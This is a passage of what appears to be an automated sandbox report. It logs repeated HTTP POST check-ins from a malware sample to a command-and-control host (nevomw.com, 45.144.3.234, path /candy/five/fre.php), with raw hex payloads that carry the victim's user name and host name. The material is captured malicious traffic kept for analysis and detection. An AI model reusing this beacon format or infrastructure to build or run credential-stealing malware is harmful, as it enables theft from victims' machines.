                                            Dec 2, 2020 11:53:38.655989885 CET | 1455 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:38.728997946 CET | 1456 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            122 | 192.168.2.6 | 49866 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:38.961338997 CET | 1462 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.015393019 CET | 1462 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.091332912 CET | 1465 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            123 | 192.168.2.6 | 49867 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:39.390388966 CET | 1471 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.443120956 CET | 1471 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.517182112 CET | 1472 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            124 | 192.168.2.6 | 49869 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:39.815212011 CET | 1477 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.867501974 CET | 1478 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.940459967 CET | 1481 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            125 | 192.168.2.6 | 49870 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:40.305916071 CET | 1487 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:40.358675003 CET | 1487 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:40.432230949 CET | 1487 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            126 | 192.168.2.6 | 49871 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:40.669919968 CET | 1488 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:40.722479105 CET | 1488 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:40.795722961 CET | 1489 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            127 | 192.168.2.6 | 49872 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:41.124373913 CET | 1490 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.197284937 CET | 1490 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:41.271989107 CET | 1490 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            128 | 192.168.2.6 | 49873 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:41.506474018 CET | 1491 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.558218956 CET | 1491 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:41.630264044 CET | 1492 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            129 | 192.168.2.6 | 49874 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:41.908529997 CET | 1493 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.961838007 CET | 1493 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:42.037555933 CET | 1493 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            13 | 192.168.2.6 | 49726 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:48.489829063 CET | 89 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.542445898 CET | 89 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:48.616770983 CET | 90 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            130 | 192.168.2.6 | 49875 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:42.363986015 CET | 1494 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:42.648721933 CET | 1494 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:42.961201906 CET | 1495 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:43.570696115 CET | 1495 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:44.446561098 CET | 1496 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            131 | 192.168.2.6 | 49876 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:44.731017113 CET | 1497 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:44.783736944 CET | 1497 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:44.857261896 CET | 1497 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            132 | 192.168.2.6 | 49877 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:45.110817909 CET | 1498 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:45.163388014 CET | 1498 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:45.239439011 CET | 1499 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            133 | 192.168.2.6 | 49878 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:45.530514956 CET | 1499 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:45.593251944 CET | 1500 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:45.675241947 CET | 1500 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            134 | 192.168.2.6 | 49879 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:45.971009970 CET | 1501 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.022999048 CET | 1501 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.096854925 CET | 1502 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            135 | 192.168.2.6 | 49880 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:46.394583941 CET | 1502 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.447155952 CET | 1503 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.522598028 CET | 1503 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            136 | 192.168.2.6 | 49881 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:46.812716961 CET | 1504 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.866413116 CET | 1504 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.941849947 CET | 1504 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
